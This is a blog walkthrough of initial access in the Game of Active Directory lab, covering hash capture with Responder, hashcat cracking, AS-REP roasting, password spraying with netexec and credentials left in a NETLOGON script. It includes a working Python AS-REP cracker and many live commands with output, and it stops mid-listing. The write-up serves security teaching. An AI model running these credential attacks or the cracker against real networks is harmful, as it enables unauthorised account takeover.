mdit.no


    GoAD Write-up – Initial Access

    Game of Active Directory part 2 – Initial access

    Foreword: This blog series shows real methods attackers use to get into, and take over, an AD environment. All of this information is already publicly available, and it is shared not as a beginner's course in cybercrime but to spread understanding of why we have to protect ourselves. Only use these tools, techniques and procedures in environments where the owner has given you explicit consent to do so.

    We continue from Part 1, which covered reconnaissance.

    In this part we look at "initial access" to systems. We focus on MITRE ATT&CK T1078.002 – Valid Accounts: Domain Accounts. Even though we already have Sam's password and a hint about Arya's, we will explore several more methods in this post.


    Responder

    If the environment uses NTLM authentication we can try to capture NTLM authentication from the network. What gets captured is a NetNTLMv2 challenge-response, not the NT hash itself: it can be cracked offline to recover the account password, but it cannot be used for pass-the-hash. In many cases we can also exploit a classic weakness and perform a relay attack, where we forward the authentication to another service without knowing the password and are still authenticated as that account against that service (this requires that the target does not enforce SMB signing; more on that below).

    Since we are on the same L2 broadcast domain as the lab, we can run a tool called Responder to see whether we can pick up any hashes. In analyze mode Responder only listens and logs LLMNR/NBT-NS/mDNS traffic; it does not answer (poison) any of the requests.

    $ sudo responder -I vxlan100 --analyze
    [+] Listening for events...
    [+] Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned 

    We captured the hash of NORTH\Eddard.Stark

    eddard.stark [...]

    And we also captured the hash of NORTH\robb.stark

    robb.stark [...]

    Trying to crack these two captured hashes with the rockyou wordlist, we see that it does not succeed for the eddard.stark account.

    $ hashcat -m 5600 creds/eddard.stark.north.sevenkingdoms.local.ntlmv2  /usr/share/wordlists/rockyou.txt
    hashcat (v6.2.6) starting
    
    OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
    ====================================================================================================================================================
    
    Minimum password length supported by kernel: 0
    Maximum password length supported by kernel: 256
    
    Hashes: 1 digests; 1 unique digests, 1 unique salts
    Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
    Rules: 1
    
    Optimizers applied:
    * Zero-Byte
    * Not-Iterated
    * Single-Hash
    * Single-Salt
    
    ATTENTION! Pure (unoptimized) backend kernels selected.
    Pure kernels can crack longer passwords, but drastically reduce performance.
    If you want to switch to optimized kernels, append -O to your commandline.
    See the above message to find out about the exact limits.
    
    Watchdog: Temperature abort trigger set to 90c
    
    Host memory required for this attack: 1 MB
    
    Dictionary cache hit:
    * Filename..: /usr/share/wordlists/rockyou.txt
    * Passwords.: 14344385
    * Bytes.....: 139921507
    * Keyspace..: 14344385
    
    Cracking performance lower than expected?                 
    
    * Append -O to the commandline.
      This lowers the maximum supported password/salt length (usually down to 32).
    
    * Append -w 3 to the commandline.
      This can cause your screen to lag.
    
    * Append -S to the commandline.
      This has a drastic speed impact but can be better for specific attacks.
      Typical scenarios are a small wordlist but a large ruleset.
    
    * Update your backend API runtime / driver the right way:
      https://hashcat.net/faq/wrongdriver
    
    * Create more work items to make use of your parallelization power:
      https://hashcat.net/faq/morework
    
    Approaching final keyspace - workload adjusted.           
    
    Session..........: hashcat                                
    Status...........: Exhausted
    Hash.Mode........: 5600 (NetNTLMv2)
    Hash.Target......: EDDARD.STARK::NORTH:1122334455667788:4162288f6fae16...000000
    Time.Started.....: Mon Sep 22 14:06:27 2025 (12 secs)
    Time.Estimated...: Mon Sep 22 14:06:39 2025 (0 secs)
    Kernel.Feature...: Pure Kernel
    Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
    Guess.Queue......: 1/1 (100.00%)
    Speed.#1.........:   916.2 kH/s (1.82ms) @ Accel:512 Loops:1 Thr:1 Vec:8
    Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
    Progress.........: 14344385/14344385 (100.00%)
    Rejected.........: 0/14344385 (0.00%)
    Restore.Point....: 14344385/14344385 (100.00%)
    Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
    Candidate.Engine.: Device Generator
    Candidates.#1....: $HEX[206b72697374656e616e6e65] -> $HEX[042a0337c2a156616d6f732103]
    Hardware.Mon.#1..: Util: 67%
    
    Started: Mon Sep 22 14:06:26 2025
    Stopped: Mon Sep 22 14:06:41 2025

    If we try robb.stark instead, the password is found very quickly. To keep it short I'm not including all of hashcat's output, but at the end we see that robb.stark's password is "sexywolfy".

    ROBB.STARK::NORTH:1122334455667788:8085a38911a1dc543eb609d7dd13ec92:[...]:sexywolfy
    

    We already have the access we need, really, but we also want to look at other weaknesses.


    AS-Rep Roasting

    One example is to check whether we can AS-REP roast the user accounts in the list we got from enum4linux in the recon phase.

    AS-REP, the reply from the Kerberos Authentication Service, can be abused if an account has the UF_DONT_REQUIRE_PREAUTH flag set ("Do not require Kerberos preauthentication").

    Anyone with network access can then ask the Kerberos Key Distribution Center (KDC) for a Ticket Granting Ticket (TGT) for that account without first proving knowledge of the password. The TGT itself is encrypted with the krbtgt key and is of no direct use to us, but the AS-REP also carries an encrypted part (containing the session key) that is encrypted with a key derived from the account's password. That part is what we can attack offline with a wordlist; a hit gives us the password, and with it a TGT that can be used to obtain service tickets for file shares, remote desktop and so on.

    $ GetNPUsers.py -usersfile creds/userlist.north.sevenkingdoms.local -request -format hashcat -outputfile creds/north.asrep -dc-ip 10.3.2.11 'NORTH/'
    
    [-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
    [-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
    [-] User SEVENKINGDOMS$ doesn't have UF_DONT_REQUIRE_PREAUTH set
    [-] User arya.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
    [-] User eddard.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
    [-] User catelyn.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
    [-] User sansa.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
    $krb5asrep$23$brandon.stark@NORTH:973db4ba589726bc964c68c804b487ce$d84f141daf8038225860954b00aee0578224ba0f052d99f0e575b0197f375f577d801bd6bb4784aa2d1d14693e8c7feb52331d1f97ce47cbd81f3114bcd88153e5fc492a6b9a42643043cae5cb79387b6d7f788d58fce52495b72c48c537668e8cb2d35c96117fb49f34ced19a3a39ff5552d9d0ef1ba74f8d022fe47b524b76b49da7e354a36588efa4e594fb0343a231c1702acd088c351280174df0963386635d2f43a8a249db4070e778185e08e73032856d523f68f2bf0028db72199fd145544ad180d3095126332b2d63acee31c6ce395be66ea84159371229c92f9f425e0bf5a126974d86d2c06919475f69965297
    [-] User rickon.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
    [-] User hodor doesn't have UF_DONT_REQUIRE_PREAUTH set
    [-] User jon.snow doesn't have UF_DONT_REQUIRE_PREAUTH set
    [-] User samwell.tarly doesn't have UF_DONT_REQUIRE_PREAUTH set
    [-] User jeor.mormont doesn't have UF_DONT_REQUIRE_PREAUTH set
    [-] User sql_svc doesn't have UF_DONT_REQUIRE_PREAUTH set

    So we have AS-REP roasted the user NORTH\Brandon.Stark: we now hold the encrypted part of his AS-REP, encrypted with a key derived from his password, and can attempt to crack that password offline. The $krb5asrep$23$ prefix means encryption type 23 (RC4-HMAC), which is hashcat mode 18200. The KDC_ERR_CLIENT_REVOKED line belongs to a disabled or locked-out account in the list; the KDC refuses it before the pre-authentication question even arises.
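    To make concrete what "cracking the AS-REP" means, here is an added example (not code from the original post, nor from impacket or hashcat) that does for etype 23 what hashcat -m 18200 does: turn each candidate password into an NT hash, derive the RC4-HMAC keys of RFC 4757 with key usage 8, RC4-decrypt the enc-part and compare the HMAC-MD5 checksum. MD4 is implemented inline because OpenSSL 3 disables it by default. The $krb5asrep$23$ line in the script is constructed with a made-up password and a placeholder enc-part, since brandon.stark's real password is not on this page; to use it for real, pass the line GetNPUsers.py wrote to creds/north.asrep together with a wordlist (it is pure Python, so expect a few thousand candidates per second, not millions).

```python
"""Offline AS-REP roast check for etype 23 (RC4-HMAC): what hashcat -m 18200 does per candidate.
Added example; the sample hash below is constructed with a made-up password."""
import hashlib
import hmac
import os
import struct

M32 = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & M32


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, needed because the NT hash is MD4(UTF-16LE(password))."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    k = lambda x, y, z: x ^ y ^ z
    r3_order = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for i in range(16):  # round 1
            a = _rotl((a + f(b, c, d) + x[i]) & M32, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2
            a = _rotl((a + g(b, c, d) + x[(i % 4) * 4 + i // 4] + 0x5A827999) & M32, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3
            a = _rotl((a + k(b, c, d) + x[r3_order[i]] + 0x6ED9EBA1) & M32, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        h = [(v + w) & M32 for v, w in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def _hmac_md5(key: bytes, msg: bytes) -> bytes:
    return hmac.new(key, msg, hashlib.md5).digest()


# RFC 4757: T is the key usage as a little-endian 32-bit int; AS-REP enc-part is usage 8 for RC4-HMAC.
AS_REP_USAGE = struct.pack("<I", 8)


def asrep_encrypt(password: str, enc_part: bytes, confounder: bytes = None) -> bytes:
    """KDC side of RC4-HMAC: checksum || RC4(K3, confounder || enc_part). Used only to build the sample;
    a real enc_part is the ASN.1 EncASRepPart, here a placeholder."""
    confounder = confounder or os.urandom(8)
    k1 = _hmac_md5(nt_hash(password), AS_REP_USAGE)
    data = confounder + enc_part
    checksum = _hmac_md5(k1, data)
    return checksum + rc4(_hmac_md5(k1, checksum), data)


def to_hashcat(user: str, realm: str, edata: bytes) -> str:
    """Same layout as GetNPUsers.py -format hashcat: $krb5asrep$23$user@REALM:checksum$rest."""
    return f"$krb5asrep$23${user}@{realm}:{edata[:16].hex()}${edata[16:].hex()}"


def try_password(hashline: str, password: str) -> bool:
    parts = hashline.split("$")
    if len(parts) != 5 or parts[1] != "krb5asrep" or parts[2] != "23":
        raise ValueError("only $krb5asrep$23$ (RC4-HMAC) hashes are handled here")
    checksum = bytes.fromhex(parts[3].split(":")[1])
    edata2 = bytes.fromhex(parts[4])
    k1 = _hmac_md5(nt_hash(password), AS_REP_USAGE)
    plaintext = rc4(_hmac_md5(k1, checksum), edata2)  # K3 = HMAC-MD5(K1, checksum)
    return hmac.compare_digest(_hmac_md5(k1, plaintext), checksum)


def crack(hashline: str, wordlist):
    """First candidate whose checksum verifies, or None."""
    return next((w for w in wordlist if try_password(hashline, w)), None)


# Constructed sample: made-up password, placeholder enc-part, fixed confounder so the line is reproducible.
SAMPLE_HASH = to_hashcat("brandon.stark", "NORTH",
                         asrep_encrypt("WinterIsComing1", b"placeholder EncASRepPart", b"\x11" * 8))

if __name__ == "__main__":
    print(crack(SAMPLE_HASH, ["rockyou", "Needle", "WinterIsComing1"]))
```

    For a real run, read the wordlist lazily: crack(line, (w.rstrip("\n") for w in open("/usr/share/wordlists/rockyou.txt", errors="ignore"))). The check is exact, not a guess: a wrong password yields a wrong K1, the decrypted bytes are garbage and the HMAC-MD5 checksum does not match.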


    Password spraying

    Next we can try guessing passwords against accounts. It is not unusual for username = password, as in admin/admin default logins and the like. Before spraying a domain, check the account lockout policy first (netexec's --pass-pol shows it) so the attempt does not lock users out.

    $ for p in $(cat creds/userlist.north.sevenkingdoms.local); do netexec smb 10.3.2.0/24 -u $p -p $p; done 
    
    Running nxc against 256 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
    SMB         10.3.2.12       445    MEEREEN          [*] Windows 10 / Server 2016 Build 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True)
    SMB         10.3.2.12       445    MEEREEN          [-] essos.local\hodor:hodor STATUS_LOGON_FAILURE
    SMB         10.3.2.23       445    BRAAVOS          [*] Windows 10 / Server 2016 Build 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True)
    SMB         10.3.2.10       445    KINGSLANDING     [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMB>
    SMB         10.3.2.22       445    CASTELBLACK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False>
    SMB         10.3.2.11       445    WINTERFELL       [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) >
    SMB         10.3.2.23       445    BRAAVOS          [+] essos.local\hodor:hodor (Guest)
    SMB         10.3.2.10       445    KINGSLANDING     [-] sevenkingdoms.local\hodor:hodor STATUS_LOGON_FAILURE
    SMB         10.3.2.22       445    CASTELBLACK      [+] north.sevenkingdoms.local\hodor:hodor
    SMB         10.3.2.11       445    WINTERFELL       [+] north.sevenkingdoms.local\hodor:hodor

    As we can see, hodor:hodor is accepted on winterfell and castelblack, but on braavos we only get guest access, because the account does not exist in the essos domain. A (Guest) result means the server fell back to a guest session without validating the password, so it must not be counted as a working credential.

    Earlier we also got a hint that NORTH\arya.stark's password might be "Needle".

    $ netexec smb --shares 10.3.2.10-30 -u "arya.stark" -p "Needle"       
    SMB         10.3.2.10       445    KINGSLANDING     [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:False)
    SMB         10.3.2.11       445    WINTERFELL       [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
    SMB         10.3.2.22       445    CASTELBLACK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:False)
    SMB         10.3.2.10       445    KINGSLANDING     [-] sevenkingdoms.local\arya.stark:Needle STATUS_LOGON_FAILURE 
    SMB         10.3.2.23       445    BRAAVOS          [*] Windows 10 / Server 2016 Build 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True) 
    SMB         10.3.2.12       445    MEEREEN          [*] Windows 10 / Server 2016 Build 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True) 
    SMB         10.3.2.11       445    WINTERFELL       [+] north.sevenkingdoms.local\arya.stark:Needle 
    SMB         10.3.2.22       445    CASTELBLACK      [+] north.sevenkingdoms.local\arya.stark:Needle 
    SMB         10.3.2.23       445    BRAAVOS          [+] essos.local\arya.stark:Needle (Guest)
    SMB         10.3.2.12       445    MEEREEN          [-] essos.local\arya.stark:Needle STATUS_LOGON_FAILURE 
    SMB         10.3.2.11       445    WINTERFELL       [*] Enumerated shares
    SMB         10.3.2.11       445    WINTERFELL       Share           Permissions     Remark
    SMB         10.3.2.11       445    WINTERFELL       -----           -----------     ------
    SMB         10.3.2.11       445    WINTERFELL       ADMIN$                          Remote Admin
    SMB         10.3.2.11       445    WINTERFELL       C$                              Default share
    SMB         10.3.2.11       445    WINTERFELL       IPC$            READ            Remote IPC
    SMB         10.3.2.11       445    WINTERFELL       NETLOGON        READ            Logon server share 
    SMB         10.3.2.11       445    WINTERFELL       SYSVOL          READ            Logon server share 
    SMB         10.3.2.22       445    CASTELBLACK      [*] Enumerated shares
    SMB         10.3.2.22       445    CASTELBLACK      Share           Permissions     Remark
    SMB         10.3.2.22       445    CASTELBLACK      -----           -----------     ------
    SMB         10.3.2.22       445    CASTELBLACK      ADMIN$                          Remote Admin
    SMB         10.3.2.22       445    CASTELBLACK      all             READ,WRITE      Basic RW share for all
    SMB         10.3.2.22       445    CASTELBLACK      C$                              Default share
    SMB         10.3.2.22       445    CASTELBLACK      IPC$            READ            Remote IPC
    SMB         10.3.2.22       445    CASTELBLACK      public          READ,WRITE      Basic Read share for all domain users
    SMB         10.3.2.23       445    BRAAVOS          [*] Enumerated shares
    SMB         10.3.2.23       445    BRAAVOS          Share           Permissions     Remark
    SMB         10.3.2.23       445    BRAAVOS          -----           -----------     ------
    SMB         10.3.2.23       445    BRAAVOS          ADMIN$                          Remote Admin
    SMB         10.3.2.23       445    BRAAVOS          all             READ,WRITE      Basic RW share for all
    SMB         10.3.2.23       445    BRAAVOS          C$                              Default share
    SMB         10.3.2.23       445    BRAAVOS          CertEnroll                      Active Directory Certificate Services share
    SMB         10.3.2.23       445    BRAAVOS          IPC$            READ            Remote IPC
    SMB         10.3.2.23       445    BRAAVOS          public                          Basic Read share for all domain users
    Running nxc against 21 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
    
    

    We see that we again get access to castelblack and winterfell as north\arya.stark with the password "Needle". On the Braavos server in essos.local we only get a guest session, just as with hodor: the (Guest) marker shows the password was not validated there, and the share listing reflects guest permissions (no READ/WRITE on "public").

    From the reconnaissance in the previous post we could also read in Samwell Tarly's description that the password should be Heartsbane. Let's try that too:

    $ netexec smb --shares 10.3.2.10-30 -u "samwell.tarly" -p "Heartsbane"
    SMB         10.3.2.10       445    KINGSLANDING     [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:False)
    SMB         10.3.2.12       445    MEEREEN          [*] Windows 10 / Server 2016 Build 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True) 
    SMB         10.3.2.23       445    BRAAVOS          [*] Windows 10 / Server 2016 Build 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True) 
    SMB         10.3.2.11       445    WINTERFELL       [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
    SMB         10.3.2.10       445    KINGSLANDING     [-] sevenkingdoms.local\samwell.tarly:Heartsbane STATUS_LOGON_FAILURE 
    SMB         10.3.2.22       445    CASTELBLACK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:False)
    SMB         10.3.2.12       445    MEEREEN          [-] essos.local\samwell.tarly:Heartsbane STATUS_LOGON_FAILURE 
    SMB         10.3.2.23       445    BRAAVOS          [+] essos.local\samwell.tarly:Heartsbane (Guest)
    SMB         10.3.2.11       445    WINTERFELL       [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane 
    SMB         10.3.2.22       445    CASTELBLACK      [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane 
    SMB         10.3.2.23       445    BRAAVOS          [*] Enumerated shares
    SMB         10.3.2.23       445    BRAAVOS          Share           Permissions     Remark
    SMB         10.3.2.23       445    BRAAVOS          -----           -----------     ------
    SMB         10.3.2.23       445    BRAAVOS          ADMIN$                          Remote Admin
    SMB         10.3.2.23       445    BRAAVOS          all             READ,WRITE      Basic RW share for all
    SMB         10.3.2.23       445    BRAAVOS          C$                              Default share
    SMB         10.3.2.23       445    BRAAVOS          CertEnroll                      Active Directory Certificate Services share
    SMB         10.3.2.23       445    BRAAVOS          IPC$            READ            Remote IPC
    SMB         10.3.2.23       445    BRAAVOS          public                          Basic Read share for all domain users
    SMB         10.3.2.11       445    WINTERFELL       [*] Enumerated shares
    SMB         10.3.2.11       445    WINTERFELL       Share           Permissions     Remark
    SMB         10.3.2.11       445    WINTERFELL       -----           -----------     ------
    SMB         10.3.2.11       445    WINTERFELL       ADMIN$                          Remote Admin
    SMB         10.3.2.11       445    WINTERFELL       C$                              Default share
    SMB         10.3.2.11       445    WINTERFELL       IPC$            READ            Remote IPC
    SMB         10.3.2.11       445    WINTERFELL       NETLOGON        READ            Logon server share 
    SMB         10.3.2.11       445    WINTERFELL       SYSVOL          READ            Logon server share 
    SMB         10.3.2.22       445    CASTELBLACK      [*] Enumerated shares
    SMB         10.3.2.22       445    CASTELBLACK      Share           Permissions     Remark
    SMB         10.3.2.22       445    CASTELBLACK      -----           -----------     ------
    SMB         10.3.2.22       445    CASTELBLACK      ADMIN$                          Remote Admin
    SMB         10.3.2.22       445    CASTELBLACK      all             READ,WRITE      Basic RW share for all
    SMB         10.3.2.22       445    CASTELBLACK      C$                              Default share
    SMB         10.3.2.22       445    CASTELBLACK      IPC$            READ            Remote IPC
    SMB         10.3.2.22       445    CASTELBLACK      public          READ,WRITE      Basic Read share for all domain users
    Running nxc against 21 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00

    Trying the same method with robb.stark and sexywolfy gives a very promising result:

    $ netexec smb --shares 10.3.2.10-30 -u "robb.stark" -p "sexywolfy"                         
    SMB         10.3.2.10       445    KINGSLANDING     [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:False)
    SMB         10.3.2.12       445    MEEREEN          [*] Windows 10 / Server 2016 Build 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True) 
    SMB         10.3.2.23       445    BRAAVOS          [*] Windows 10 / Server 2016 Build 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True) 
    SMB         10.3.2.22       445    CASTELBLACK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:False)
    SMB         10.3.2.10       445    KINGSLANDING     [-] sevenkingdoms.local\robb.stark:sexywolfy STATUS_LOGON_FAILURE 
    SMB         10.3.2.12       445    MEEREEN          [-] essos.local\robb.stark:sexywolfy STATUS_LOGON_FAILURE 
    SMB         10.3.2.23       445    BRAAVOS          [+] essos.local\robb.stark:sexywolfy (Guest)
    SMB         10.3.2.22       445    CASTELBLACK      [+] north.sevenkingdoms.local\robb.stark:sexywolfy 
    SMB         10.3.2.23       445    BRAAVOS          [*] Enumerated shares
    SMB         10.3.2.23       445    BRAAVOS          Share           Permissions     Remark
    SMB         10.3.2.23       445    BRAAVOS          -----           -----------     ------
    SMB         10.3.2.23       445    BRAAVOS          ADMIN$                          Remote Admin
    SMB         10.3.2.23       445    BRAAVOS          all             READ,WRITE      Basic RW share for all
    SMB         10.3.2.23       445    BRAAVOS          C$                              Default share
    SMB         10.3.2.23       445    BRAAVOS          CertEnroll                      Active Directory Certificate Services share
    SMB         10.3.2.23       445    BRAAVOS          IPC$            READ            Remote IPC
    SMB         10.3.2.23       445    BRAAVOS          public                          Basic Read share for all domain users
    SMB         10.3.2.22       445    CASTELBLACK      [*] Enumerated shares
    SMB         10.3.2.22       445    CASTELBLACK      Share           Permissions     Remark
    SMB         10.3.2.22       445    CASTELBLACK      -----           -----------     ------
    SMB         10.3.2.22       445    CASTELBLACK      ADMIN$                          Remote Admin
    SMB         10.3.2.22       445    CASTELBLACK      all             READ,WRITE      Basic RW share for all
    SMB         10.3.2.22       445    CASTELBLACK      C$                              Default share
    SMB         10.3.2.22       445    CASTELBLACK      IPC$            READ            Remote IPC
    SMB         10.3.2.22       445    CASTELBLACK      public          READ,WRITE      Basic Read share for all domain users
    SMB         10.3.2.11       445    WINTERFELL       [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
    SMB         10.3.2.11       445    WINTERFELL       [+] north.sevenkingdoms.local\robb.stark:sexywolfy (Pwn3d!)
    SMB         10.3.2.11       445    WINTERFELL       [*] Enumerated shares
    SMB         10.3.2.11       445    WINTERFELL       Share           Permissions     Remark
    SMB         10.3.2.11       445    WINTERFELL       -----           -----------     ------
    SMB         10.3.2.11       445    WINTERFELL       ADMIN$          READ,WRITE      Remote Admin
    SMB         10.3.2.11       445    WINTERFELL       C$              READ,WRITE      Default share
    SMB         10.3.2.11       445    WINTERFELL       IPC$            READ            Remote IPC
    SMB         10.3.2.11       445    WINTERFELL       NETLOGON        READ,WRITE      Logon server share 
    SMB         10.3.2.11       445    WINTERFELL       SYSVOL          READ,WRITE      Logon server share 
    Running nxc against 21 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00

    So we already have full admin access on the Winterfell DC (the (Pwn3d!) marker means the account is a local administrator on that host, and ADMIN$ and C$ are listed with READ,WRITE), but we will look at a couple more things before leaving the initial access topic.

    The first thing I want to demonstrate is how to look for information in, among other places, Group Policy.

    Taking the access we get with just hodor:hodor as the starting point, we can see for example that we have read rights on the SYSVOL and NETLOGON shares on the domain controller.

    SMB         10.3.2.11       445    WINTERFELL       [*] Enumerated shares
    SMB         10.3.2.11       445    WINTERFELL       Share           Permissions     Remark
    SMB         10.3.2.11       445    WINTERFELL       -----           -----------     ------
    SMB         10.3.2.11       445    WINTERFELL       ADMIN$                          Remote Admin
    SMB         10.3.2.11       445    WINTERFELL       C$                              Default share
    SMB         10.3.2.11       445    WINTERFELL       IPC$            READ            Remote IPC
    SMB         10.3.2.11       445    WINTERFELL       NETLOGON        READ            Logon server share 
    SMB         10.3.2.11       445    WINTERFELL       SYSVOL          READ            Logon server share 

    We use smbclient to connect to winterfell's NETLOGON share as hodor with the password hodor.

    $ smbclient //winterfell.north.sevenkingdoms.local/NETLOGON -U "hodor"
    Password for [WORKGROUP\hodor]:
    Try "help" to get a list of possible commands.
    smb: \> ls
      .                                   D        0  Mon Sep 22 14:08:35 2025
      ..                                  D        0  Mon Sep 22 14:08:35 2025
      script.ps1                          A      165  Thu Sep 11 15:04:32 2025
      secret.ps1                          A      869  Thu Sep 11 15:04:34 2025
    
                    15638527 blocks of size 4096. 9445328 blocks available
    smb: \> mget *
    Get file script.ps1? yes
    getting file \script.ps1 of size 165 as script.ps1 (5.2 KiloBytes/sec) (average 5.2 KiloBytes/sec)
    Get file secret.ps1? yes
    getting file \secret.ps1 of size 869 as secret.ps1 (22.3 KiloBytes/sec) (average 14.6 KiloBytes/sec)
    smb: \> exit

    We found two interesting files – script.ps1 and secret.ps1 – which look very promising.

    Looking at the contents of script.ps1 we find the credentials of jeor.mormont.

    $ cat script.ps1 
    # fake script in netlogon with creds
    $task = '/c TODO'
    $taskName = "fake task"
    $user = "NORTH\jeor.mormont"
    $password = "_L0ngCl@w_"
    
    # passwords in sysvol still ...   

    We can check whether they work with netexec:

    $ netexec smb --shares 10.3.2.10-30 -u "jeor.mormont" -p "_L0ngCl@w_"
    SMB         10.3.2.22       445    CASTELBLACK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:False)
    SMB         10.3.2.23       445    BRAAVOS          [*] Windows 10 / Server 2016 Build 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True) 
    SMB         10.3.2.12       445    MEEREEN          [*] Windows 10 / Server 2016 Build 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True) 
    SMB         10.3.2.10       445    KINGSLANDING     [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:False)                                                                                                                                                              
    SMB         10.3.2.11       445    WINTERFELL       [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)                                                                                                                                                          
    SMB         10.3.2.22       445    CASTELBLACK      [+] north.sevenkingdoms.local\jeor.mormont:_L0ngCl@w_ (Pwn3d!)
    SMB         10.3.2.23       445    BRAAVOS          [+] essos.local\jeor.mormont:_L0ngCl@w_ (Guest)
    SMB         10.3.2.12       445    MEEREEN          [-] essos.local\jeor.mormont:_L0ngCl@w_ STATUS_LOGON_FAILURE 
    SMB         10.3.2.10       445    KINGSLANDING     [-] sevenkingdoms.local\jeor.mormont:_L0ngCl@w_ STATUS_LOGON_FAILURE 
    SMB         10.3.2.11       445    WINTERFELL       [+] north.sevenkingdoms.local\jeor.mormont:_L0ngCl@w_ 
    SMB         10.3.2.23       445    BRAAVOS          [*] Enumerated shares
    SMB         10.3.2.23       445    BRAAVOS          Share           Permissions     Remark
    SMB         10.3.2.23       445    BRAAVOS          -----           -----------     ------
    SMB         10.3.2.23       445    BRAAVOS          ADMIN$                          Remote Admin
    SMB         10.3.2.23       445    BRAAVOS          all             READ,WRITE      Basic RW share for all
    SMB         10.3.2.23       445    BRAAVOS          C$                              Default share
    SMB         10.3.2.23       445    BRAAVOS          CertEnroll                      Active Directory Certificate Services share
    SMB         10.3.2.23       445    BRAAVOS          IPC$            READ            Remote IPC
    SMB         10.3.2.23       445    BRAAVOS          public                          Basic Read share for all domain users
    SMB         10.3.2.11       445    WINTERFELL       [*] Enumerated shares
    SMB         10.3.2.11       445    WINTERFELL       Share           Permissions     Remark
